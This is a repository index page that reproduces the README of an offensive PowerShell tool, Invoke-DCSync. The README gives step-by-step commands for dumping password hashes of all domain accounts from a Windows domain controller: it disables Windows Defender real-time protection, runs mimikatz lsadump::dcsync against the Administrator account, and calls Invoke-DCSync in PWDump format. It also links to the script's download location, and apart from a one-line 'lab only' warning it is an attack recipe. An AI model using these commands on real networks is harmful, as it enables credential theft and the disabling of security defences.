https://github.com/al1ex/invoke-dcsync

Invoke-DCSync
https://github.com/al1ex/invoke-dcsync

invoke-dcsync

Last synced: 5 months ago
JSON representation

Invoke-DCSync

Host: GitHub
URL: https://github.com/al1ex/invoke-dcsync
Owner: Al1ex
Created: 2020-09-11T13:06:19.000Z (over 5 years ago)
Default Branch: master
Last Pushed: 2020-09-11T13:08:54.000Z (over 5 years ago)
Last Synced: 2025-02-03T09:40:53.552Z (over 1 year ago)
Topics: invoke-dcsync
Language: PowerShell
Homepage:
Size: 494 KB
Stars: 1
Watchers: 2
Forks: 3
Open Issues: 0
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

README

# Invoke-DCSync
Invoke-DCSync
Reference: https://adsecurity.org/?p=1729
Reference: https://silentbreaksecurity.com/invoke-dcsync-because-we-all-wanted-it/
Goal: retrieve password hashes from all user accounts on a domain controller using the mimikatz DCSync function

Warning：Only do this in a lab environment.

mimikatz implemented a tool called DCSync, this allows mimikatz to impersonate a Domain Controller and attempt to retrieve all password hashes from another domain controller.

You may need to disable Windows Defender

Open up PowerShell as an administrator and type

$ Set-MpPreference -DisableRealtimeMonitoring $true

Start mimikatz

$ lsadump::dcsync /domain:test.local /user:Administrator

Now you have the password hash from that user

This required that you have Administrator access, specifically the Get-Replication-Changes-All Common Name attribute

Can use the Invoke-DCSync module to extract all hashes.

Download from: https://gist.github.com/monoxgas/9d238accd969550136db

~~~
$ Import-Module ./Invoke-DCSync.ps1
$ Invoke-DCSync -PWDumpFormat
~~~

ecosyste.ms

Data

Tools

Indexes

Applications

Experiments

Awesome

https://github.com/al1ex/invoke-dcsync

Awesome Lists containing this project

README